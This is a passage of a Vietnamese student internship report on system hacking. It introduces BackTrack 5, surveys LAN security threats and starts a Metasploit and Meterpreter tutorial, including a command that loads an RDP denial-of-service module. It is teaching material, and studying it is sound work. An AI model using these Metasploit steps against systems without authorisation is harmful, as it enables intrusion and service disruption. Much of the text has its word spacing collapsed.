SlideShare a Scribd company logo
1 of 37
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
1 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Mục Lục
CHƯƠNG I. GIỚI THIỆU VỀ BACKTRACK 5.............................................5
I. Giớithiệu.............................................................................................................................................5
II. Mụcđích.............................................................................................................................................6
CHƯƠNG 2. TÌNH HÌNH BẢO MẬT MẠNG LAN HIỆN NAY ..................7
I. Giớithiệu.......................................................................................................................................7
II. Vấnđềbảomậthệthốngvàmạng....................................................................................................7
CHƯƠNG 3. Tấn Công Hệ Thống –System Hacking ....................................13
I. Giới Thiệu Về Metasploit........................................................................13
1. Giới Thiệu..................................................................................................................................13
2. Các Thành Phần Của Metasploit................................................................................................13
3. Sử dụng Metasploit Framework.................................................................................................14
a) Chọn module exploit.............................................................................................................. 14
b) Cấu hình module exploit đã chọn........................................................................................... 14
c) Verify những options vừa cấu hình........................................................................................ 14
d) Lựa chọn target ...................................................................................................................... 14
e) Lựa chọn payload................................................................................................................... 14
f) Thựcthiexploit........................................................................................................................ 15
4. Giớithiệu Payload Meterpreter ..................................................................................................15
a) Sử dụng module Fs................................................................................................................. 15
b) Sử dụng module Net............................................................................................................... 16
c) Sử dụng module Process........................................................................................................ 16
d) Sử dụng module Sys............................................................................................................... 16
5. Cách phòng chống .....................................................................................................................16
II. Lỗi MS10-046 (2286198)..........................................................................16
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
2 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
1. Giới thiệu ...................................................................................................................................16
2. Các bước tấn công......................................................................................................................17
a. (mạng LAN)............................................................................................................................. 17
b. Triễn Khai trên vps................................................................................................................. 32
III. Cách phòng chống....................................................................................36
Tài Liệu Tham Khảo..........................................................................................36
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
3 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN
………………………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
.……………………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
….…………………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
…….………………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
……….……………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
………….…………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
…………….………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
……………….……………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
………………….…………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
…………………….………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
……………………….……………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
………………………….…………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
…………………………….
NGÀY… THÁNG… NĂM
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
4 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN
………………………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
.……………………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
….…………………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
…….………………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
……….……………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
………….…………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
…………….………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
……………….……………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
………………….…………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
…………………….………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
……………………….……………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
………………………….…………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
…………………………….
NGÀY… THÁNG… NĂM
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
5 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Lời Cảm Ơn
Em xin gởi lời cảm ơn chân thành và sự tri ân sâu sắc đối với các thầy
cô của Trung tâm đào tạo quản trị mạng và an ninh quốc tế ATHENA ,
đặc biệt là các thầy cô khoa Công Nghệ Thông Tin của trƣờng đã tạo
điều kiện cho em thực tập ở khoa để có nhiều thời gian cho khóa luận
tốt nghiệp. Và em cũng xin chân thành cám ơn thầy Võ Công Minh đã
nhiệt tình hƣớng dẫn hƣớng dẫn em hoàn thành tốt khóa thực tập.
Trong quá trình thực tập, cũng nhƣ là trong quá trình làm bài báo cáo,
khó tránh khỏi sai sót, rất mong các Thầy, Cô bỏ qua. Đồng thời do
trình độ lý luận cũng nhƣkinh nghiệm thực tiễn còn hạn chế nên bài
báo cáo không thể tránh khỏi những thiếu sót, em rất mong nhận
đƣợc ý kiến đóng góp Thầy, Cô để em học thêm đƣợc nhiều kinh
nghiệm và sẽ hoàn thành tốt hơn bài báo cáo tốt nghiệp sắp tới.
Em xin chân thành cảm ơn !
CHƢƠNGI. GIỚI THIỆU VỀ BACKTRACK 5
I. Giớithiệu
Backtrack làmộtbảnphânphốidạngLiveDVDcủaLinux,đượcpháttriểnđểthử nghiệm
thâm nhập.Trong các định dạng Live DVD, chúng ta sử dụng có thể Backtracktrực
tiếptừđĩaDVDmàkhôngcần càinóvào máycủachúngta.Backtrack cũngcó thểđượccài
đặt vàoổcứngvàsửdụngnhưmộthệđiềuhành.Backtracklà sự
hợpnhấtgiữa3bảnphânphốikhácnhaucủaLinuxvềthâmnhậpthửnghiệm -
IWHAX,WHOPPIX,và Auditor.Trongphiênbảnhiệntạicủanó(5),Backtrackđược
dựatrênphiênbảnphânphốiLinuxUbuntu11.10.Tínhđếnngày19thángbảynăm
2010,Backtrack5đãđượctảivềcủahơn1,5triệungườisửdụng.Phiên bảnmớinhất
làBacktrack5R2
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
6 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
II. Mụcđích
Công cụBacktrack đãcólịchsửpháttriểnkhálâuquanhiềubảnlinuxkhác
nhau.PhiênbảnhiệnnaysửdụngbảnphânphốiSlackwarelinux(TomasM.(www.slax.org))
.Backtrackliên tục cậpnhậtcáccôngcụ,drivers,...hiệntạiBacktrack
cótrên300côngcụphụcvụchoviệcnghiêncứubảomật.Backtracklàsựkếthợp
giữa2bộcôngcụkiểmthửbảo mậtrất nổitiếnglà WhaxvàAuditor.
Backtrack5chứamộtsốcôngcụcóthểđượcsửdụngtrongquátrìnhthử
nghiệmthâmnhậpcủachúngta.Cáccông cụkiểmtrathâmnhậptrongBacktrack5,0
cóthểđượcphânloạinhưsau:
 Informationgathering: loạinàycóchứamộtsốcôngcụcóthểđượcsử dụng
đểcóđượcthôngtinliênquanđếnmộtmụctiêuDNS,định tuyến, địa chỉe-
mail,trangweb,máychủmail,vànhưvậy.Thôngtinnàyđượcthu
thậptừcácthôngtincósẵntrênInternet,màkhôngcầnchạmvàomôi
trườngmụctiêu.
 Networkmapping:loạinàychứacáccôngcụcóthểđượcsửdụngđểkiểm
tracáchostđangtồntại,thông tinvềOS,ứngdụngđượcsửdụngbởimục
tiêu,vàcũnglàmportscanning.
 Vulnerabilityidentification:Trongthểloạinày,chúngtacóthểtìmthấycác
côngcụđểquétcáclỗhổng(tổng hợp)vàtrongcácthiếtbịCisco. Nócũng
chứacáccôngcụđểthựchiệnvàphântíchServer MessageBlock(SMB) và
SimpleNetworkManagementProtocol(SNMP).
 Webapplicationanalysis:loạinàychứacáccôngcụcóthểđượcsửdụng
trongtheodõi,giámsátcácứngdụngweb
 Radionetworkanalysis:Đểkiểmtramạngkhôngdây,bluetoothvànhận dạng
tầnsốvôtuyến (RFID),chúngtacóthểsửdụng cáccôngcụtrongthể loạinày.
 Penetration:loạinày chứacáccôngcụcóthểđượcsửdụngđểkhaitháccáclỗ
hổngtìmthấytrongcácmáytínhmụctiêu
 Privilegeescalation: Saukhikhaitháccáclỗhổngvàđượctruycậpvàocác
máytínhmụctiêu,chúngtacóthểsửdụngcáccôngcụtrongloạinàyđể
nângcaođặcquyềncủachúngtachocácđặcquyềncaonhất.
 Maintainingaccess:Côngcụtrongloạinàysẽcóthểgiúpchúngtatrong
việcduytrìquyềntruycậpvàocácmáytínhmụctiêu.Chúngtacóthểcần
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
7 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
đểcóđượcnhững đặcquyềncaonhấttrướckhicácchúngtacóthểcàiđặt
côngcụđểduytrì quyềntruycập
 VoiceOverIP (VOIP):ĐểphântíchVOIP chúngtacóthểsửdụngcáccông
cụtrongthểloạinày
 Digitalforensics:Trongloạinày,chúngtacóthểtìmthấy mộtsốcôngcụcó
thểđượcsửdụngđểlàmphântíchkỹthuậtnhưcóđượchìnhảnhđĩacứng,
cấutrúccáctậptin,vàphântíchhìnhảnhđĩacứng.Đểsửdụngcáccôngcụ
cungcấptrongthểloạinày,chúngtacóthểchọnStartBacktrackForensics
trongtrìnhđơnkhởiđộng.Đôikhisẽ đòihỏichúngta phảigắnkết nộibộđĩa
cứngvàcáctậptintraođổitrongchếđộchỉđọcđểbảotồntínhtoànvẹn.
Reverseengineering:Thểloạinàychứacáccôngcụcóthểđượcsửdụngđểgỡrốichư
ơngtrìnhmộthoặctháorời mộttập tinthựcthi.
CHƢƠNG 2.TÌNH HÌNH BẢO MẬT MẠNG LAN HIỆN NAY
I. Giớithiệu
Anninhantoànmạngmáytínhhoàntoànlàvấnđềconngười,dođóviệcđưa ramột
hànhlangpháplývàcácquy nguyêntắclàmviệccụthểlàcầnthiết.Ởđây, hành lang
pháplýcóthểgồm:cácđiềukhoảntrongbộluậtcủanhànước,cácvăn bản
dướiluật,...Còncácquyđịnhcóthểdotừngtổchứcđặtrachophùhợpvớitừng
đặcđiểmriêng.Cácquy địnhcóthểnhư:quy địnhvềnhânsự,việcsửdụng
máy,sửdụngphầnmềm,... Vànhưvậy,sẽhiệuquảnhấttrongviệcđảmbảoanninh an
toànchohệthốngmạngmáytínhmộtkhita thựchiệntriệt đểgiảiphápvề chính
sáchconngười.Tómlại,vấnđềanninhantoànmạngmáytínhlàmộtvấnđề lớn,nóyêu cầu
cầnphảicómộtgiảipháptổngthể,khôngchỉphầnmềm,phầncứng máytính
mànóđòihỏicảvấnđềchínhsáchvềconngười. Vàvấnđềnày cầnphải được thực
hiệnmộtcáchthườngxuyênliêntục,khôngbaogiờtriệtđểđượcvìnó luôn nảy
sinhtheothờigian.Tuynhiên,bằngcácgiảipháptổngthểhợplý,đặcbiệt là
giảiquyếttốtvấnđềchínhsáchvềconngườitacóthểtạorachomìnhsựan toàn chắcchắnhơn
II. Vấnđềbảomậthệthốngvàmạng
1. Cácvấn dềchung vềbảo mật hệthống và mạng
Đặcđiểmchungcủamộthệthốngmạnglàcónhiềungườisửdụngchung vàphântánvề
mặt địa lýnênviệcbảovệtàinguyên(mất máthoặcsửdụngkhông
hợplệ)phứctạphơnnhiềusovớiviệcmôitrườngmộtmáytínhđơnlẻ,hoặc
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
8 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
mộtngườisửdụng.Hoạtđộngcủangườiquảntrịhệthốngmạngphảiđảmbảocác
thôngtintrênmạnglàtincậyvàsửdụngđúngmụcđích,đốitượngđồngthờiđảmbảo
mạnghoạtđộngổnđịnhkhôngbịtấncôngbởinhữngkẻpháhoại.Nhưngtrênthựctế
làkhôngmộtmạngnàođảmbảolàantoàntuyệtđối,mộthệthốngdùđượcbảovệ chắcchắnđến
mứcnàothìcũngcó lúcbịvôhiệuhóabởinhữngkẻcó ýđồxấu.
2. Một số kháiniệmvà lịch sử bảo mật hệthống
a)Đối tượngtấn công mạng (intruder)
Đốitượng lànhững cánhânhoặctổchứcsửdụngnhững kiến thứcvề mạngvà
cáccôngcụpháhoại(gồm phần cứnghoặcphầnmềm) đểdòtìmcácđiểm yếuvà cáclỗhổng
bảomậttrênhệthống,thựchiệncáchoạtđộngxâmnhậpvà
chiếmđoạttàinguyêntráiphép.Mộtsốđốitượngtấncôngmạngnhư:Hacker:lànhững
kẻxâmnhậpvàomạngtráiphépbằngcáchsửdụngcáccôngcụphámậtkhẩuhoặc khai thác
cácđiểmyếucủa thànhphầntruynhậptrên hệthốngMasquerader:Lànhững
kẻgiảmạothông tintrênmạng nhưgiảmạođịachỉIP, tênmiền,địnhdanhngười
dùng…Eavesdropping:Lànhữngđốitượngnghetrộmthôngtintrênmạng,sử dụngcác
côngcụSniffer,sauđódùngcáccôngcụphântíchvàdebugđểlấyđược cácthôngtincógiátrị.
Nhữngđốitượngtấncôngmạngcóthểnhằmnhiềumụcđích
khácnhaunhưăncắpcácthôngtincógiátrịvềkinhtế,pháhoạihệthốngmạngcó chủ
định,hoặccóthểđólà nhữnghànhđộngvôýthức…
b)Các lỗhổngbảomật
Cáclỗhổngbảomậtlànhữngđiểmyếutrênhệthốnghoặcẩnchứa trongmột
dịchvụmàdựavàođókẻtấncôngcóthểxâmnhậptráiphépvàohệthống
đểthựchiệnnhữnghànhđộngpháhoạichiếmđoạttàinguyênbấthợppháp.Cónhiều
nguyênnhângây ranhữnglỗhổngbảomật:cóthểdolỗicủabảnthân hệthống,hoặc
phầnmềmcungcấphoặcngườiquảntrịyếukémkhônghiểusâu vềcácdịchvụcung
cấp…Mứcđộảnhhưởngcủacáclỗhổngtớihệ thốnglàkhácnhau.Cólỗhổngchỉảnh
hưởngtớichấtlượngdịchvụcungcấp,cólỗhổngảnhhưởngtớitoànbộhệthốnghoặc
pháhủyhệ thống
c)Chính sách bảomật
Chínhsáchbảomậtlàtậphợpcácquytắcápdụngchonhữngngười
thamgiaquảntrị mạng,cósửdụngcáctàinguyênvàcácdịchvụmạng.
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
9 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Đốivớitừngtrườnghợpphảicóchínhsáchbảomậtkhácnhau.Chính sáchbảo
mậtgiúpngườisửdụngbiếttráchnhiệmcủamìnhtrongviệc
bảovệcáctàinguyêntrênmạng,đồngthờicòngiúpchonhàquảntrịmạngthiếtlập
cácbiênphápđảm bảohữuhiệutrongquátrìnhtrangbị,cấuhìnhvàkiểmsoáthoạt
độngcủahệthốngvà mạng.
3. Các loạilỗ hổng bảomật vàphƣơng thứctấn công mạng chủ yếu
a)Các loại lỗ hổng
Cónhiềucáctổchứcđãtiếnhànhphânloạicácdạnglỗhổngđặcbiệt.
TheobộquốcphòngMỹcácloạilỗhổngđượcphânlàmbaloạinhưsau:
LỗhổngloạiC
ChophépthựchiệncáchìnhthứctấncôngtheoDoS(Denial ofServices-Từ chốidịch
vụ)Mứcđộnguyhiểmthấp chỉ ảnh hưởngtớichấtlượngdịchvụ,làmngưng
trệ,giánđoạnhệthống,khônglàmpháhỏngdữliệuhoặcđạtđượcquyềntruy cậpbất
hợppháp.DoSlàhìnhthứctấncôngsửdụngcácgiaothứcởtầngInternettrongbộgiao
thứcTCP/IP đểlàmhệthốngngưngtrệdẫnđếntìnhtrạngtừchốingườisửdụng hợp
pháptruynhậphaysửdụnghệthống.Cácdịchvụcólỗhổngchophépcáccuộctấn
côngDoScóthểđượcnângcấphoặcsửachữabằngcácphiênbản mớihơncủacácnhàcung
cấp dịch vụ. Hiệnnay chưa có một biện pháp hữu hiệu nào để khắc phục tình trạng tấn
công kiểu nàyvì bản thân thiết kế ở tầng Internet (IP) nói riêng và bộ giao thức
TCP/IP nói chungđã ẩn chứa những nguy cơ tiềm tang của các lỗ hổng loại này.
Lỗ hổng loại B:
Cho phép người sử dụng có thêm các quyền trên hệ thống mà không cần kiểm
tra tính hợp lệ dẫn đến mất mát thông tin yêu cầu cần bảo mật.Lỗ hổng này thường có
trong các ứng dụng trên hệ thống .Có mức độ nguy hiểm là trung bình.Lỗ hổng loại B
này có mức độ nguy hiểm hơn lỗ hổng loại C. Cho phépngười sử dụng nội bộ có thể
chiếm được quyền cao hơn hoặc truy nhậpkhônghợp pháp.
Những lỗ hổng loại này thường xuất hiện trong các dịch vụ trên hệ
thống.Ngườ sử dụng local được hiểu là người đã có quyền truy nhập vào hệ thống
vớimột số quyền hạn nhất định.Tìm hiểu vấn đề bảo mật mạng LAN. Một dạng khác
của lỗ hổng loại B xảy ra với các chương trình viết bằng mã nguồn C. Những chương
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
10 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
trình viết bằng mã nguồn C thường sử dụng một vùngđệm, một vùng trong bộ nhớ sử
dụng để lưu trữ dữ liệu trước khi xử lý. Người lậptrình thường sử dụng vùng đệm
trong bộ nhớ trước khi gán một khoảng không gian bộ nhớ cho từng khối dữ liệu. Ví
dụ khi viết chương trình nhập trường tên người sửdụng quy định trường này dài 20 ký
tự bằng khai báo:Charfirst_name [20]; Khai báo này cho phép người sử dụng nhập tối
đa 20ký tự. Khi nhập dữ liệu ban đầu dữ liệu được lưu ở vùng đệm. Khi người sử
dụngnhập nhiều hơn 20 ký tự sẽ tràn vùng đệm.Những ký tự nhập thừa sẽ nằm
ngoàivùng đệm khiến ta không thể kiểm soát được.Nhưng đối với những kẻ tấn
côngchúng có thể lợi dụng những lỗ hổng này để nhập vào những ký tự đặc biệt để
thựcthi một số lệnh đặc biệt trên hệ thống. Thông thường những lỗ hổng này được
lợidụng bởi những người sử dụng trên hệ thống để đạt được quyền root không hợp
lệ.Để hạn chế được các lỗ hổng loại B phải
kiêm soát chặt chẽ cấu hình hệ thống vàcác chương trình.
Lỗ hổng loại A
Cho phép người ngoài hệ thống có thể truy cập bất hợp phápvào hệ thống.Có
thể làm phá huỷ toàn bộ hệ thống.Loại lỗ hổng này có mức độ rấtnguy hiểm đe dọa
tính toàn vẹn và bảo mật của hệ thống.Các lỗ hổng này thườngxuất hiện ở những hệ
thống quản trị yếu kém hoặc không kiểm soát được cấu hìnhmạng.Những lỗ hổng
loại này hết sức nguy hiểm vì nó đã tồn tại sẵn có trên phầnmềm sử dụng, người quản
trị nếu không hiểu sâu về dịch vụ và phần mềm sử dụngcó thể bỏ qua điểm yếu
này.Vì vậy thường xuyên phải kiểm tra các thông báo củacác nhóm tin về bảo mật
trên mạng để phát hiện những lỗ hổng loại này. Một loạtcác chương trình phiên bản
cũ thường sử dụng có những lỗ hổng loại A như: FTP,Gopher, Telnet, Sendmail,
ARP, finger.
b)Cáchìnhthứctấncôngmạngphổbiến
Scanner
Scannerlàmộtchươngtrìnhtựđộngràsoátvàpháthiệnnhữngđiểmyếuvề
bảomậttrênmộttrạmlàmviệccụcbộhoặcmộttrạm ởxa.Mộtkẻpháhoạisửdụng
chươngtrìnhScannercóthểpháthiệnranhững lỗhổngvềbảomậttrênmộtServerdù
ởxa.Cơchếhoạtđộnglàràsoátvàpháthiện nhữngcổngTCP/UDPđượcsửdụngtrên
hệthốngcầntấncôngvàcácdịchvụsửdụngtrênhệthốngđó.Scanner ghilạinhững đáp
ứngtrênhệthốngtừxatương ứngvớidịch vụmànóphát hiệnra.Từđónócóthể
tìmrađiêmyếucủahệthống.NhữngyếutốđểmộtScannerhoạtđộngnhưsau:Yêu
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
11 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
cầuthiếtbịvàhệthống: Môitrường cóhỗtrợTCP/IPHệthốngphảikếtnốivàomạng
Internet.CácchươngtrìnhScannercóvaitròquantrọngtrong mộthệthốngbảo mật,vì
chúngcókhảnăngpháthiệnranhữngđiểmyếukémtrênmộthệ thốngmạng.
PasswordCracker
Làmộtchươngtrìnhcó khảnănggiảimãmộtmậtkhẩuđã đượcmãhoáhoặccó
thểvôhiệu hoá chứcnăngbảo vệmậtkhẩu của mộthệthống.Mộtsốchươngtrìnhphá
khoácónguyêntắchoạtđộngkhácnhau.Mộtsốchương trìnhtạoradanhsáchcáctừ
giớihạn,áp dụngmộtsố thuậttoán mãhoátừkết quảso sánhvớiPasswordđãmãhoá
cầnbẻkhoáđểtạoramộtdanhsáchkháctheomộtlogiccủachươngtrình.Khithấy
phùhợpvớimậtkhẩuđãmãhoá,kẻpháhoạiđãcóđượcmậtkhẩudướidạngtext.
Mậtkhẩutextthôngthườngsẽđượcghivàomộtfile.Biệnphápkhắcphụcđốivới
cáchthứcpháhoạinàylàcầnxâydựngmộtchínhsáchbảovệ mậtkhẩuđúngđắn.
Sniffer
Snifferlàcáccôngcụ(phầncứnghoặcphầnmềm)”bắt”cácthôngtin
lưuchuyểntrênmạngvàlấycácthôngtincógiátrịtraođổitrênmạng.Sniffer cóthể
“bắt”đượccácthôngtintraođổigiữanhiềutrạmlàmviệc vớinhau. Thựchiệnbắtcác
góitintừtầngIP trởxuống.GiaothứcởtầngIP đượcđịnhnghĩacôngkhai,và cấutrúc
cáctrườngheaderrõràng,nênviệcgiảimãcácgóitinnàykhôngkhókhăn.
Mụcđíchcủacácchươngtrìnhsniffer đólàthiếtlậpchếđộpromiscuous(mode
dùngchung)trêncáccardmạngethernet-nơicácgóitintraođổitrongmạng -từđó
"bắt"đượcthôngtin.Các thiếtbịsniffer cóthểbắtđượctoànbộthôngtintraođổitrên
mạnglàdựavàonguyêntắcbroadcast (quảngbá)cácgọitintrongmạngEthernet.Tuy
nhiênviệcthiếtlậpmộthệthốngsniffer không phảiđơngiảnvìcầnphảixâm nhập
đượcvàohệthốngmạngđóvàcàiđặtcácphầnmềmsniffer.Đồng thờicácchương
trìnhsniffercũngyêucầungườisửdụngphảihiểusâu vềkiếntrúc,cácgiaothức
mạng.Việcpháthiệnhệthốngbịsnifferkhôngphảiđơngiản,vìsnifferhoạtđộngở
tầngrấtthấp,vàkhôngảnhhưởngtớicácứngdụngcũngnhưcácdịchvụhệthốngđócungcấp.T
uynhiênviệcxâydựngcácbiệnpháphạnchếsniffercũngkhôngquá
khókhănnếutatuânthủcácnguyêntắcvề bảo mậtnhư:
 Khôngchongườilạtruynhậpvàocácthiếtbịtrênhệthống
 Quảnlýcấuhìnhhệthốngchặtchẽ
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
12 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
 Thiếtlậpcáckếtnốicó tínhbảomậtcaothôngquacáccơchế mãhoá.
Trojans
Trojans làmộtchươngtrìnhchạykhônghợplệtrênmộthệthống.Vớivaitrò
nhưmộtchươngtrìnhhợppháp.Trojansnàycóthểchạy đượclàdocácchươngtrình
hợpphápđãbịthayđổimãcủanóthànhmãbấthợppháp.Vídụnhưcácchươngtrình
viruslàloạiđiểnhìnhcủaTrojans.Nhữngchươngtrìnhvirus thường chedấucácđoạn
mãtrongcácchươngtrìnhsửdụnghợppháp.Khinhữngchươngtrìnhnày đượckích
hoạtthìnhững đoạnmãẩndấusẽthực thivàchúng thựchiệnmộtsốchứcnăngmà
ngườisửdụngkhôngbiếtnhư:ăncắpmậtkhẩuhoặccopy filemàngườisửdụngnhư
tathườngkhônghaybiết.MộtchươngtrìnhTrojanssẽ thựchiệnmộttrongnhữngcông
việcsau:
Thựchiệnmộtvàichứcnănghoặcgiúpngườilậptrìnhlênnóphát hiệnnhững
thôngtinquantrọng hoặcnhững thôngtincánhântrênmộthệthốnghoặcchỉ trênmột
vàithànhphầncủahệthốngđó.
Chedấumộtvàichứcnăng hoặc làgiúpngười lậptrìnhpháthiệnnhữngthông
tinquantrọnghoặcnhữngthôngtincánhântrênmộthệthốnghoặcchỉtrênmột vài
thànhphầncủahệthống.Ngoàiracòncócácchương trìnhTrojancóthểthựchiện
đựợccảhaichứcnăngnày.Cóchương trìnhTrojancòncóthểpháhủy hệthốngbằng cách
pháhoạicácthôngtintrênổcứng.NhưngngàynaycácTrojanskiểunàydễdàng
bịpháthiệnvàkhópháthuyđượctácdụng.Tuy nhiêncónhữngtrườnghợpnghiêm
trọnghơnnhữngkẻtấncôngtạo ranhữnglỗ hổngbảomậtthôngqua Trojansvàkẻ tấn
cônglấyđượcquyềnroottrênhệthốngvàlợidụngquyềnđóđểpháhủymộtphần
hoặctoànbộhệthốnghoặcdùngquyềnrootđểthayđổilogfile,càiđặtcácchương
trìnhtrojanskhácmàngườiquảntrịkhôngthểpháthiệnđượcgâyramứcđộảnh
hưởngrấtnghiêmtrọngvàngườiquảntrịchỉcòncáchcàiđặtlạitoànbộhệthống.
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
13 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
CHƢƠNG 3. Tấn Công Hệ Thống –System Hacking
I. Giới Thiệu Về Metasploit
1. Giới Thiệu
Metasploit là một dự án bảo mật máy tính cung cấp các thông tin
về vấn đề lỗ hổng bảo mật cũng như giúp đỡ về kiểm tra thâm
nhập và phát triển hệ thống phát hiện tấn công mạng. Một dự án
con rất nổi tiếng của Metasploit là Metasploit Framework.
Metasploit Framework là một môi trường dùng để kiểm tra ,tấn
công và khai thác lỗi của các service. Metasploit được xây dựng
từ ngôn ngữ hướng đối tượng Perl, với những components được
viết bằng C, assembler, và Python.Metasploit có thể chạy trên
hầu hết các hệ điều hành: Linux, Windows, MacOS
2. Các Thành Phần Của Metasploit
Metasploit hỗ trợ nhiều giao diện với người dùng:
 Consoleinterface: dùng lệnh msfconsole. Msfconsole
interface sử dụng các dòng lệnh để cấu hình, kiểm tra nên
nhanh hơn và mềm dẻo hơn
 Webinterface: dùng msfweb, giao tiếp với người dùng thông
qua giao diện web
 Commandlineinterface: dùng msfcli
Enviroment:
 GlobalEnviroment:được thực thi thông qua 2 câu lệnh setg
và unsetg, những options được gán ở đây sẽ mang tính toàn
cục, được đưa vào tất cả các module exploits
 TemporaryEnviroment: được thực thi thông qua 2 câu lệnh
set và unset, enviroment này chỉ được đưa vào module exploit
đang load hiện tại, không ảnh hưởng đến các module exploit
khác
Chúng có thể lưu lại enviroment mình đã cấu hình thông qua lệnh
save. Môi trường đó sẽ được lưu trong ./msf/config và sẽ được load
trở lại khi user interface được thực hiện
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
14 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
3. Sử dụng Metasploit Framework
a) Chọn module exploit
Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để
khai thác
 show exploits: xem các module exploit mà
framework có hỗ trợ
 useexploit_name: chọn module exploit
 infoexploit_name: xem thông tin về module
exploit
Chúng ta nên cập nhật thường xuyên các lỗi dịch vụ
cũng như các module trên www.metasploit.com hoặc
qua lệnh msfupdate hoặc svn update /opt/metasploit/msf3/
b) Cấu hình module exploit đã chọn
 showoptions: Xác định những options nào cần cấu hình.
 set : cấu hình cho những option của module đó
Một vài module còn có những advanced options, chúng ta có thể
xem bằng cách gõ dòng lệnh showadvanceds
c) Verify những options vừa cấu hình
 check:kiểm tra xem những option đã được set chính xác
chưa.
d) Lựa chọn target
Lựa chọn hệ diều hành nào để thực hiện
 showtargets: những target được cung cấp bởi module đó
 set: xác định target nào
vd: msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
e) Lựa chọn payload
Payloadlàđoạncodemàsẽchạytrênhệthốngremotemachine,làmột
phầncủavirusmáytínhđểthựcthimãđộc.
 showpayloads:liệtkêranhữngpayloadcủa
moduleexploithiệntại
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
15 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
 infopayload_name:xemthôngtinchitiếtvề payloadđó
 Set payload payload_name:
xácđịnhpayloadmodulename.Saukhi
lựachọnpayloadnào,dùnglệnh showoptionsđểxem những
options củapayloadđó
 showadvanced:xemnhữngadvancedoptionscủapayloadđó
f) Thựcthiexploit
 exploit:lệnhdùngđểthựcthipayloadcode.Payloadsauđósẽcung
cấpchochúngtanhữngthôngtinvềhệthốngđượckhaithác
4. Giớithiệu Payload Meterpreter
MeterpreterviếttắttừMeta-
Interpreterlàmộtpayloadnângcaocótrong
MetasploitFramework.Mụcđíchcủanólàđểcungcấpnhữngtậplệnhđ
ểkhaithác tấncângcácmáyremote
computers.Nóđượcviếttừcácdevelopers dướidạngshared
object(DLL)files.Meterpretervà
cácthànhphầnmởrộngđượcthựcthitrongbộnhớ, hoàntoànkhông
đượcghilênđĩanên cóthể tránhđượcsựphát hiệntừcácphầnmềm
chốngvirus.
Meterpretercungcấpmộttậplệnhđểchúngtacóthểkhaitháctrêncách
remote computers:
 Fs(Filesystem):cungcấpquátrìnhtươngtácvớifilesystem
 Net: cho phépxemthôngtinmạngcủa
remotemachinenhưIP,route table
 Process:cho phép tạo tương tác với các tiến trình trên remote
machine
 Sys: cho phép xem thông tin hệ thống, môi trường của
remote machine
a) Sử dụng module Fs
 cd directory:giống lệnh cd của commandline, chuyển thư
mục làm việc
